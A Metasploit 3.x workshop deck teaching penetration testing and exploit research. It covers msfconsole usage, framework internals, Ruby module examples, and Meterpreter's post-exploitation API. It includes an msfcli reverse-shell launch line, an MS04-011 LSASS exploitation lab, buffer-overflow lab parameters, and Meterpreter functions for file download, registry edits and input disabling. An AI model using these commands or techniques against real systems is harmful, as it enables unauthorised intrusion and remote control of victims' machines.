This document provides an overview of the Metasploit exploitation framework. It discusses Metasploit's structure and components, including modules, plugins, the Rex library, and the Framework Core classes. It describes the main interfaces for using Metasploit (msfconsole, msfcli, msfweb, and msfgui). It also covers using Metasploit as a user, developer, and expert, including automation, Metasploitable, and Metasploit's most capable payload, Meterpreter.
Exploitation Frameworks: Metasploit 3.x Workshop
Steven McGrath
What to Accomplish
Understanding Metasploit as a user
Understanding the basics of Ruby
Understanding Metasploit as a developer
Understanding Metasploit as an expert
What this is...
To build a better understanding of Metasploit
To learn how to use the framework in exploit research
To learn how to use Metasploit in pen-testing
What this is NOT...
A l33t h@x0r class
Reasons why Metasploit is better than everything else... it isn't
h@x0ring this network
You should have...
Backtrack Image (supplied)
VMWare Player/Workstation/Fusion (supplied)
A laptop to run all of this on (NOT supplied)
Starting off
What is Metasploit?
How is it used?
What are other tools?
What benefits does Metasploit have?
What is it?
Metasploit is an exploitation framework, NOT a vulnerability scanner.
How is it used?
Primarily as an aid in exploitation research.
Secondarily in pen-testing.
What are other tools?
CORE Impact
CANVAS
Benefits?
Price
CORE Impact = $25,000 USD a year
CANVAS = $1244 USD + Support
Flexibility
Open Source = More Options
Downsides?
Flexibility
Most Metasploit payloads are Windows-specific.
Completeness
The framework is under active development, but there are still holes in the framework that need to be addressed.
Metasploit as a User
What to cover?
Control Interfaces
Basic usage
msfconsole
Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable
msfconsole
Automation?
Automation is achieved through resource files: a list of commands that msfconsole runs at console startup, exactly as if the user had typed them.
msfconsole
Configuration files?
msfconsole can store per-user configuration data. By default this lives in ~/.msf3.
msfconsole
Basic Commands:
set / unset
load / unload
use / show
save
sessions
jobs
route
info
irb
loadpath
back
check / exploit / run
msfconsole - set/unset
set - Sets a variable to the specified value. Run alone, it lists the variables that can be set.
unset - Removes the value from a variable or series of variables.
setg - Global equivalent of set.
unsetg - Global equivalent of unset.
NOTE: local variables override globals.
msfconsole - load/unload
load - Loads a plugin into the framework. You can also pass values for optional variables at load time.
unload - Unloads a plugin.
loadpath - Adds a module path for the framework to search and load modules from. Useful for custom modules.
msfconsole - show/use
show - Displays lists of modules: auxiliary, exploits, payloads, encoders, and nops.
use - Changes your context within the framework to the selected module.
back - Returns you to the global context.
msfconsole - save
save - Saves your current state (e.g. current module and set variables)
msfconsole - sessions
sessions - Session interaction...
-i - Interacts with the specified session.
-l - Lists the active sessions.
msfconsole - jobs
jobs - Displays information regarding backgrounded jobs (typically client-side exploits)
-l - Lists the active jobs.
-k - Kills the specified job.
msfconsole - route
route - Allows you to interact with the framework routing table (useful in "pivoting").
msfconsole - info
info - Displays information about the specified module(s).
msfconsole - irb
irb - Provides an interactive Ruby shell into the framework. Useful for live scripting and/or modification of code.
msfconsole - check/exploit
check - Checks whether the specified target is vulnerable to an exploit.
exploit - Launches an exploit against the specified target.
run - Launches an auxiliary module against the specified target(s).
NOTE: A check is normally not required before exploiting a target.
msfconsole - rcheck/rexploit
rcheck - Reloads the module from disk before running the check.
rexploit - Same as rcheck, but launches the actual exploit.
msfcli
Command-line interface
Arguments are passed on the command line to tell Metasploit what to do
Traditionally used for automation
msfcli
Example:
./msfcli exploit/example RHOST=192.168.1.100 LHOST=192.168.1.50 PAYLOAD=windows/shell/reverse_tcp E
The trailing E selects the execute mode; run ./msfcli -h for the other modes and more info.
msfweb
Web interface to Metasploit
Ruby on Rails application
The primary interface on Windows
msfgui
Still under HEAVY development
GTK GUI to Metasploit
An attempt to make Metasploit more like CANVAS and CORE from the user's standpoint
msfd
Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the hassle of screen; pivot points, exploits, and sessions are all shared.
Before we continue...
From this point on we will be assuming msfconsole
Exploit Me!
Target: 10.0.0.5
Exploit Module to use: windows/smb/ms04_011_lsass
Payload: Anything you choose!
Feel free to ask your classmates and me :)
Metasploit as a Developer
Metasploit as a Developer
This will be a hands-on workshop.
You WILL be writing your own exploit before we leave.
Due to time constraints, we will first walk through a few example modules before the workshop portion.
Starting off...
Getting to know Ruby
A general understanding of how Metasploit 3.x is built
Example Code
Lab
Getting to know Ruby
Interpreted, not compiled.
Object oriented by design
The red-headed stepchild of Python, Perl, and Smalltalk
Getting to know Ruby
Hello World:
#!/usr/bin/env ruby
# This is the hello world application
var1 = "Hello World!"
print "\n#{var1}\n"    # string interpolation with #{...}
print var1, "\n"       # print accepts several arguments
Getting to know Ruby - Lab
Extend the basic TCP server in your materials to respond to any input given.
Getting to know Ruby - Lab
require 'socket'

port = 44455
host = 'localhost'
server = TCPServer.new(host, port)

# Accept clients one at a time; echo every line back, prefixed with "R: ",
# until the client closes its side of the connection.
while (session = server.accept)
  while !session.eof?
    session.puts "R: #{session.gets}"
  end
  session.close
end
Metasploit's Structure - Dirs
data - Data files for the framework
documentation - Examples, guides, etc.
external - Non-framework software
lib - Framework libraries
modules - Module root for the framework
plugins - Plugin root for the framework
scripts - Script root for the framework
tools - Development tools
Metasploit’s Structure - Dirs
modules
auxiliary - Auxiliary module root
encoders - Encoder module root
exploits - Exploit module root
nops - NOP module root
payloads - Payload module root
Metasploit's Structure
What is the difference between an exploit and an auxiliary module?
Exploit modules actually deliver a payload
Auxiliary modules cover anything else
Metasploit's Structure (architecture diagram; image not included in the transcript)
Rex
Ruby Exploitation Library
Derived from Metasploit 2’s Pex libraries
Located in lib/rex
Rex is the base that most of the framework builds upon
Rex Subsystems
Architectures
Encoding
Exploitation
I/O
Logging
Nops
Non-Protocol Clients
Polymorphic Blocks
Payload
Parsers
Post-Exploit
Protocols
Services
Sockets
Text Manipulation
User Interface
Framework Core
Core interface into the framework
Handles the core aspects of the framework:
Module interaction (loading, unloading, etc.)
Exploitation handling
Plugins
Sessions
Located under lib/msf/core
Framework Core Classes
Framework
Datastore
EncodedPayload
EventDispatcher
ExploitDriver
Module (with the subclasses Auxiliary, Encoder, Exploit, Nop, Payload)
Handler
OptionContainer
Plugin
Session
Framework Base
Thin interaction layer between Framework Core and modules, plugins, and user interfaces
Digging In...
Now that we have a basic understanding of how the framework is built, it's time to dig into the plugins and modules themselves...
Metasploit Plugins
Plugins extend the framework dynamically.
Plugins are NOT modules.
All of the user interfaces are essentially plugins to the framework.
Metasploit Plugins
Example plugins:
Database support
msfd
Threading
Session hooks
Session taggers
IPS filters
Metasploit Plugins
module Msf
  # A plugin is a class under Msf::Plugin; the framework instantiates it on "load".
  class Plugin::Example < Msf::Plugin
    # Methods mixed into the framework object itself
    module ExampleExtension
      def example_ext
        "This is a Test"
      end
    end

    def initialize(framework, options)
      super                         # let Msf::Plugin record the framework and options
      framework.extend(ExampleExtension)
    end
  end
end
Framework Modules
Modules serve specific purposes within the framework.
Modules use an extensible, well-defined interface for interaction within the framework.
All modules inherit from Msf::Module.
Metasploit Modules
Common hash keys (passed to super in initialize) and their types:
Name - String
Description - String
Version - String
Author - Array
Arch - Array
Platform - PlatformList
Ref - Array
License - String
Example Module
require 'msf/core'

module Msf
  class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary
    include Exploit::Remote::Tcp      # gives us connect/sock/disconnect
    include Auxiliary::Scanner        # calls run_host once per host in RHOSTS

    def initialize
      super(
        'Name'        => 'HTTP Scanner',
        'Author'      => 'Maniac <maniac@chigeek.com>',
        'Description' => %q{Scans for HTTP Servers in RHOSTS.}
      )
      register_options(
        [
          Opt::RPORT(80),
          # HTTP wants CRLF line endings; a blank line terminates the request
          OptString.new("SENDSTRING", [ false,
            "String to send if port is open", "HEAD / HTTP/1.0\r\n\r\n" ])
        ], self.class)
    end

    def run_host(ip)
      connect
      sock.put(datastore['SENDSTRING'])
      data = sock.get_once             # nil if the peer sends nothing
      print_status("#{ip}\nReceived: #{data.to_s}\n")
    ensure
      disconnect                       # always release the socket, even on error
    end
  end
end
Framework Modules - Lab
Use the lab module template and extend it into a buffer-overflow exploit with the following information:
Host: 10.0.0.5
Return: 0xbfbfed20
Buffer: 76 bytes + [target.ret].pack('V') + payload.encoded
23. Metasploit as an Expert
Tasty Good Stuff!
Automation
Meterpreter
Attack Automation
24. Attack Automation
Attack automation can happen in a number of different ways:
  Pseudo-Automated
  Full Automation
Pseudo-Automation
Resource files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
db_autopwn, driven by:
  Existing Nessus data
  Existing Nmap data
Full Automation
db_autopwn
db_nmap - Scans a network with nmap and then exploits hosts based on what the scan put into the database.
25. Meterpreter
Meterpreter
Extensible - extensions can be written to enhance Meterpreter.
Powerful - Flexible protocol and channelized communication.
Stealthy - No disk access and no new process: in-memory DLL injection.
Meterpreter - OMGWTF!
This is how it works:
1. Metasploit sends the first stage payload.
2. The payload talks back to Metasploit.
3. Metasploit sends a second stage containing a DLL injection payload.
4. Metasploit sends the Meterpreter server DLL.
5. The DLL injection payload loads the server DLL in memory.
6. The Meterpreter client and server communicate over the established channels.
26. Meterpreter - UI
client.ui
Method             Description
disable_keyboard   Disables the Keyboard
disable_mouse      Disables the Mouse
enable_keyboard    Enables the Keyboard
enable_mouse       Enables the Mouse
idle_time          Returns idle time in seconds
Meterpreter - Filesystem
client.fs.dir
Method                          Description
chdir(path)                     Change Directories
delete(path)                    Delete Directory
download(dst, src, recursive)   Download Content to Local
entries(path)                   Show Contents of Directory
getwd                           Get the Working Directory
mkdir(path)                     Make Directory
upload(dst, src, recursive)     Upload Content to Host
Meterpreter - Filesystem
client.fs.file
Method                  Description
download(dest, files)   Downloads Files to Local
expand_path(path)       Expands Env Strings in Path
stat(path)              Returns info on file
upload(dest, files)     Uploads Files to Remote
27. Meterpreter - Filesystem
client.fs.file.new
Method                  Description
(file, [r,w])           Opens file
close                   Closes file
read(length)            Reads X bytes from file
seek(offset, whence)    Seeks to offset in file
write(buffer)           Writes buffer to the file
Meterpreter - Networking
client.net.config
Method                  Description
add_route(s, n, g)      Adds route
each_interface          Displays interfaces
each_route              Displays routes
get_interfaces          Returns array of interfaces
get_routes              Returns array of routing table
remove_route(s, n, g)   Removes route
Meterpreter - Config
client.sys.config
Method           Description
getuid           Returns Process UID
revert_to_self   Calls RevertToSelf
sysinfo          Returns System Name and Host Information
28. Meterpreter - Power
client.sys.power
Method                    Description
reboot(reason)            Reboots Host
shutdown(force, reason)   Shuts down Host
Meterpreter - Processes
client.sys.process
Method                      Description
each_process                Displays running processes
execute(path, args, opts)   Executes binary
getpid                      Returns current process
kill(pid)                   Kills process
processes                   Returns array of processes
open(pid, perms)            Opens process
Meterpreter - Registry
client.sys.registry
Method                           Description
close_key(hk)                    Closes an open key
create_key(hk, bk, perm)         Creates new key
delete_key(hk, bk, recursive)    Deletes key
delete_value(hk, name)           Deletes reg value
enum_key(hk)                     Returns array of subkeys
open_key(hk, bk, perm)           Opens a reg key
query_value(hk, name)            Returns reg value
set_value(hk, name, type, val)   Sets reg value
31. maniac_scanner.rb 2007-09-04
  require 'msf/core'

  module Msf
  class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary
    # Exploit mixins should be added first
    include Exploit::Remote::Tcp
    # Scanner mixin should be included last
    include Auxiliary::Scanner

    def initialize
      super(
        'Name'        => 'Generic Scanner Template',
        'Author'      => 'Maniac <maniac@chigeek.com>',
        'Description' => %q{
          Connect to every host specified in the RHOSTS
          network range, send a probe, read a response, and
          print that response to the screen.
        }
      )
      register_options(
        [
          # Specify the predefined RPORT option
          Opt::RPORT(25),
          # Specify a new option containing the string to send to the server
          OptString.new("SENDSTRING", [ false, "The string to send",
            "HEAD / HTTP/1.0\n\n" ])
        ], self.class )
    end

    # Work with a single IP address at a time
    def run_host(ip)
      # Call the connect() method provided by the TCP mixin
      connect
      sock.put(datastore['SENDSTRING'])
      # get_once returns nil if the host accepts the connection but sends nothing
      data = sock.get_once
      print_status(ip + " Received: " + data.to_s)
      # Call the disconnect() method provided by the TCP mixin
      disconnect
    end
  end
  end
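Both the HTTP Scanner module above and this maniac_scanner.rb template share the same run_host core: connect, put a probe string, read one chunk with get_once, print it. The following is an added example, not code from the slides or from the Metasploit code base, that isolates that probe step as a plain Ruby function and handles the two cases the template leaves implicit: a host that accepts the connection and then stays silent or closes (where get_once yields nil and a bare string concatenation raises TypeError), and a read that would otherwise block the whole scan. `probe_socket`, `format_result`, `demo_probe` and `PROBE_TIMEOUT` are names chosen for this example; the fake server and the 192.0.2.x addresses are constructed test fixtures so the code runs offline over a local socket pair.

```ruby
require 'socket'

# Added example (not from the slides or Metasploit): the scanner's probe
# step as a stand-alone function. probe_socket, format_result, demo_probe
# and PROBE_TIMEOUT are names invented for this example.

PROBE_TIMEOUT = 2.0 # seconds to wait for the first response chunk

# Send `payload` on `sock`, then return the first chunk of the reply, or nil
# if the peer closed or stayed silent for `timeout` seconds. Mirrors what
# sock.get_once gives the module, including its nil result.
def probe_socket(sock, payload, timeout = PROBE_TIMEOUT)
  sock.write(payload)
  ready = IO.select([sock], nil, nil, timeout)
  return nil if ready.nil?                 # silence until the timeout
  data = sock.read_nonblock(4096, exception: false)
  return nil if data.nil? || data == :wait_readable || data.empty?
  data
rescue Errno::ECONNRESET, EOFError
  nil                                      # peer reset or closed on us
end

# Format one result line the way run_host prints it, without the nil pitfall.
def format_result(ip, data)
  data ? "#{ip} Received: #{data.strip}" : "#{ip} No response"
end

# Run the probe against a fake server on a UNIX socket pair so the behaviour
# is visible without network access. `responder` gets the request and returns
# a reply string, or nil to model a server that silently closes the connection.
def demo_probe(ip, payload, &responder)
  client, server = UNIXSocket.pair
  peer = Thread.new do
    request = server.readpartial(4096)
    reply = responder.call(request)
    server.write(reply) if reply
    server.close
  end
  data = probe_socket(client, payload, 1.0)
  peer.join
  client.close
  format_result(ip, data)
end

if __FILE__ == $PROGRAM_NAME
  probe = "HEAD / HTTP/1.0\n\n"
  puts demo_probe("192.0.2.10", probe) { |req| req.start_with?("HEAD") ? "HTTP/1.0 200 OK\r\n" : nil }
  puts demo_probe("192.0.2.11", probe) { |_req| nil }
end
```

The timeout matters as much as the nil check: a scan over a RHOSTS range is only as fast as its slowest host, so a service that accepts connections and never answers would otherwise stall run_host indefinitely.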
33. 2007-09-05
  #!/usr/bin/env ruby
  ##### Example TCP Server Lab #####
  # In this lab you will be modifying the
  # code to return any input to the client.
  require 'socket'

  # Let's define the port and host.
  port = 44455
  host = 'localhost'

  # Create a new listening server.
  server = TCPServer.new(host, port)

  # Let's stay active as long as we are
  # accepting connections.
  while (session = server.accept)
    # As long as we do not terminate
    # our client, let's stay within this
    # context.
    while !session.eof?
      # Something should go here ;)
      # (read from session and write the data back)
    end
    session.close
  end
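One way to complete the lab, as an added example rather than the handout's own solution: the echo logic is placed in a function that takes any input and output IO, so it can be checked offline with StringIO and then reused unchanged inside the TCPServer accept loop. `serve_session`, `echo_demo`, `run_echo_server`, `ECHO_HOST` and `ECHO_PORT` are names chosen for this example; only the port 44455 and the localhost binding come from the lab.

```ruby
require 'socket'
require 'stringio'

# Added example (not the lab handout's code): echo-server solution with the
# per-connection logic separated from the listening socket. The names
# serve_session, echo_demo, run_echo_server, ECHO_HOST and ECHO_PORT are
# chosen for this example; the port and host are the lab's values.

ECHO_HOST = 'localhost'
ECHO_PORT = 44455

# Read from `input` until the client closes its side and write each line
# straight back to `output`. Returns the number of lines echoed.
def serve_session(input, output)
  count = 0
  until input.eof?
    line = input.gets
    break if line.nil?
    output.write(line)
    output.flush
    count += 1
  end
  count
end

# Offline check: feed the handler a scripted client transcript and return
# [lines echoed, bytes the client would have received].
def echo_demo(transcript)
  output = StringIO.new
  echoed = serve_session(StringIO.new(transcript), output)
  [echoed, output.string]
end

# The real server from the lab, one thread per client so a slow or idle
# client does not block the accept loop. Blocks forever; call it explicitly.
def run_echo_server(host = ECHO_HOST, port = ECHO_PORT)
  server = TCPServer.new(host, port)
  loop do
    session = server.accept
    Thread.new(session) do |s|
      begin
        serve_session(s, s)
      ensure
        s.close
      end
    end
  end
end
```

Start the listener with `run_echo_server` from an irb session or a one-line wrapper script, then connect with `nc localhost 44455` and type a few lines; each comes straight back. The handler reads line by line rather than spinning on `eof?`, which is the piece the lab's empty inner loop leaves out.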